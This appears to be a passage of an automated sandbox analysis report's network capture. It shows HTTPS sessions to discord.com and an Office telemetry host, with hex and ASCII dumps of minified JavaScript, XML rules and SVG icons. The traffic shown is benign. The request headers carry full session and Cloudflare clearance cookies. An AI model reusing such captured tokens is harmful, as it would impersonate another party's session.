                                                                                                                                                                                                                                                                                    Data Ascii: ry{M.Z.dispatch({type:"PURCHASED_ITEMS_FESTIVITY_IS_FETCHING_WOW_MOMENT_MEDIA",value:!0});let t=e?S.Z:b.Z;window.matchMedia("(min-width: 1012px) and (max-width: 1980px)").matches||window.matchMedia("(min-height: 720px) and (max-height: 1408px)").matches?t
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 4d 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 5f 43 52 45 41 54 45 44 2c 74 29 2c 28 29 3d 3e 7b 66 2e 53 2e 75 6e 73 75 62 73 63 72 69 62 65 28 54 2e 43 6b 4c 2e 50 52 45 4d 49 55 4d 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 5f 43 52 45 41 54 45 44 2c 74 29 7d 7d 2c 5b 65 2c 62 5d 29 3b 6c 65 74 5b 50 2c 79 5d 3d 73 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 5b 5a 2c 55 5d 3d 73 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 43 3d 28 30 2c 6d 2e 75 73 65 53 70 72 69 6e 67 29 28 7b 6f 70 61 63 69 74 79 3a 50 3f 2e 32 3a 30 2c 63 6f 6e 66 69 67 3a 7b 64 75 72 61 74 69 6f 6e 3a 31 30 30 7d 7d 29 2c 46 3d 28 30 2c 6d 2e 75 73 65 53 70 72 69 6e 67 29 28 7b 78 3a 5a 3f 22 31 30 30 25 22 3a 22 2d 31 30 30 25 22 2c 63 6f 6e 66 69 67 3a 7b 64 75 72 61 74 69 6f 6e 3a 35 30 30
                                                                                                                                                                                                                                                                                    Data Ascii: M_SUBSCRIPTION_CREATED,t),()=>{f.S.unsubscribe(T.CkL.PREMIUM_SUBSCRIPTION_CREATED,t)}},[e,b]);let[P,y]=s.useState(!1),[Z,U]=s.useState(!1),C=(0,m.useSpring)({opacity:P?.2:0,config:{duration:100}}),F=(0,m.useSpring)({x:Z?"100%":"-100%",config:{duration:500
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1086INData Raw: 72 61 70 70 65 72 3a 22 77 72 61 70 70 65 72 5f 63 64 32 32 65 37 22 2c 61 63 74 69 76 65 57 72 61 70 70 65 72 3a 22 61 63 74 69 76 65 57 72 61 70 70 65 72 5f 63 64 32 32 65 37 22 2c 76 69 64 65 6f 57 72 61 70 70 65 72 3a 22 76 69 64 65 6f 57 72 61 70 70 65 72 5f 63 64 32 32 65 37 22 2c 67 61 64 69 65 6e 74 48 69 67 68 6c 69 67 68 74 3a 22 67 61 64 69 65 6e 74 48 69 67 68 6c 69 67 68 74 5f 63 64 32 32 65 37 22 2c 73 77 69 70 65 57 72 61 70 70 65 72 3a 22 73 77 69 70 65 57 72 61 70 70 65 72 5f 63 64 32 32 65 37 22 2c 73 77 69 70 65 3a 22 73 77 69 70 65 5f 63 64 32 32 65 37 22 7d 7d 2c 32 33 33 39 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 2e 5a 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 73 73 65 74
                                                                                                                                                                                                                                                                                    Data Ascii: rapper:"wrapper_cd22e7",activeWrapper:"activeWrapper_cd22e7",videoWrapper:"videoWrapper_cd22e7",gadientHighlight:"gadientHighlight_cd22e7",swipeWrapper:"swipeWrapper_cd22e7",swipe:"swipe_cd22e7"}},233975:function(e,t){t.Z="https://cdn.discordapp.com/asset


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    140192.168.2.54985513.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 2145ee07-e01e-003c-0347-3cc70b000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201253Z-15b8b599d88wk8w4hC1TEB14b800000003h0000000003fqz
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    141192.168.2.54985613.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 502
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 2151d667-701e-0021-3e0f-3d3d45000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201253Z-178bfbc474bq2pr7hC1NYCkfgg000000050g00000000fqpa
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    142192.168.2.549864162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC674OUTGET /assets/2597d11c1e039607373e.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 139
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d1151961de9a-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "72a8b168ad2c7eea7b2559b5690c7695"
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 05 Jun 2024 19:27:56 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XgyAyTpBnpPqAWgD2nbqmKMEMJAESIBRsSPNfv%2BQYhkzE6iDi4OlxjRYdu8kV836jnoz%2BlHvBNFpBM%2FtlY11FhTdw4SkRlogl7qqycw7hRqkPUkyMGjmyqXBEkB%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC139INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 20 38 22 20 77 69 64 74 68 3d 22 38 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 22 20 63 79 3d 22 34 22 20 72 3d 22 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                                                                                                    Data Ascii: <svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    143192.168.2.549863162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC674OUTGET /assets/a5ec2b74d0cc337d4481.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC967INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:54 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 2058
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d115eb8a728f-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "e1349377226366f95f85ab9eac4586d3"
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 05 Jun 2024 19:27:58 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mP6RuIwOISbs742U3nPF1YgDgnboviAblguFkCQj%2BW74IPORM8sJN0h%2B%2BhkV%2BSOgUPntBtlGee%2BCw61tn1atuOlCKcbeCOgNjMxRg97lBScKUOM7A%2FVompbp%2BXUx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC402INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 35 20 34 35 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 0a 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 20 63 6c 69 70 50 61 74 68 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 33 36 68 33 36 56 30 48 30 76 33 36 5a 22 2f 3e 0a 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 3c 6d 61 73 6b 20 69 64 3d 22 62 22 3e 0a 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 20 78 3d 22 30 22 20 79 3d 22 30 22 20 77 69 64 74 68 3d
                                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve"> <defs> <clipPath id="a" clipPathUnits="userSpaceOnUse"> <path d="M0 36h36V0H0v36Z"/> </clipPath> <mask id="b"> <g> <rect x="0" y="0" width=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC1369INData Raw: 3e 0a 20 20 20 20 3c 2f 6d 61 73 6b 3e 0a 20 20 3c 2f 64 65 66 73 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 61 29 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 32 35 20 30 20 30 20 2d 31 2e 32 35 20 30 20 34 35 29 22 20 6d 61 73 6b 3d 22 75 72 6c 28 23 62 29 22 3e 0a 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 37 35 20 31 38 2e 32 35 63 31 2e 32 32 36 2d 32 2e 31 39 35 20 31 2e 38 35 35 20 31 2e 33 36 31 20 39 2e 33 31 33 20 32 2e 36 32 35 20 37 2e 34 35 37 20 31 2e 32 36 34 20 31 33 2e 37 32 38 2d 34 2e 34 35 34 20 31 33 2e 38 35 39 2d 35 2e 34 31 33 43 33 36 2e 30 35 33 20 31 34 2e 35 30 34 20
                                                                                                                                                                                                                                                                                    Data Ascii: > </mask> </defs> <g> <g> <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" mask="url(#b)"> <g> <path d="M12.75 18.25c1.226-2.195 1.855 1.361 9.313 2.625 7.457 1.264 13.728-4.454 13.859-5.413C36.053 14.504
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC287INData Raw: 2e 37 36 38 20 31 2e 35 32 38 2d 33 2e 31 34 20 32 2e 37 34 34 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 35 30 32 20 31 39 2e 33 37 35 63 2e 30 34 34 2d 2e 36 32 35 2e 35 30 36 2d 31 2e 35 31 31 2e 35 30 36 2d 31 2e 35 31 31 2d 31 2e 30 31 36 2d 31 2e 34 37 33 2d 35 2e 36 34 33 2d 33 2e 30 31 36 2d 37 2e 33 35 34 2d 32 2e 39 32 39 2e 30 39 36 2e 36 32 37 2e 32 38 33 20 31 2e 33 36 32 2e 36 32 37 20 32 2e 30 39 36 20 31 2e 38 34 34 2e 34 37 31 20 34 2e 36 36 20 31 2e 30 37 31 20 36 2e 32 32 31 20 32 2e 33 34 34 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: .768 1.528-3.14 2.744" fill="white"/> </g> <g> <path d="M12.502 19.375c.044-.625.506-1.511.506-1.511-1.016-1.473-5.643-3.016-7.354-2.929.096.627.283 1.362.627 2.096 1.844.471 4.66 1.071 6.221 2.344" fill="white"/> </g>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    144192.168.2.549868162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:54 UTC1398OUTGET /assets/55ad931ed92a15c15709.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    Range: bytes=102533-109612
                                                                                                                                                                                                                                                                                    If-Range: "80f500d4d0495e5c74e9b92cbc26f088"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC993INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:54 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 7080
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Range: bytes 102533-109612/109613
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d11adb6c4237-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "80f500d4d0495e5c74e9b92cbc26f088"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 15 Oct 2024 21:49:59 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4U7PUwGH0x7lGVcPsuQuFEnppbi8F4sf2tq6fxodynfS%2F0%2BHbUUrlOtZcYQHlpkK8O6nQmHwt2UGqnIhhmei6rjR8cZ4RMgQe8Sj0AuEPghzFnIp7oXiUN9J4ZEl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC376INData Raw: 3d 74 29 7b 74 68 69 73 2e 63 61 6e 63 65 6c 4e 65 78 74 43 61 6c 6c 62 61 63 6b 28 29 3b 76 61 72 20 6e 3d 69 2e 64 65 66 61 75 6c 74 2e 66 69 6e 64 44 4f 4d 4e 6f 64 65 28 74 68 69 73 29 3b 74 3d 3d 3d 63 3f 74 68 69 73 2e 70 65 72 66 6f 72 6d 45 6e 74 65 72 28 6e 2c 65 29 3a 74 68 69 73 2e 70 65 72 66 6f 72 6d 45 78 69 74 28 6e 29 7d 65 6c 73 65 20 74 68 69 73 2e 70 72 6f 70 73 2e 75 6e 6d 6f 75 6e 74 4f 6e 45 78 69 74 26 26 74 68 69 73 2e 73 74 61 74 65 2e 73 74 61 74 75 73 3d 3d 3d 6c 26 26 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 73 74 61 74 75 73 3a 73 7d 29 7d 2c 61 2e 70 65 72 66 6f 72 6d 45 6e 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 6f 3d 74 68 69 73 2e 70 72 6f 70 73 2e 65 6e 74 65 72 2c 72 3d
                                                                                                                                                                                                                                                                                    Data Ascii: =t){this.cancelNextCallback();var n=i.default.findDOMNode(this);t===c?this.performEnter(n,e):this.performExit(n)}else this.props.unmountOnExit&&this.state.status===l&&this.setState({status:s})},a.performEnter=function(e,t){var n=this,o=this.props.enter,r=
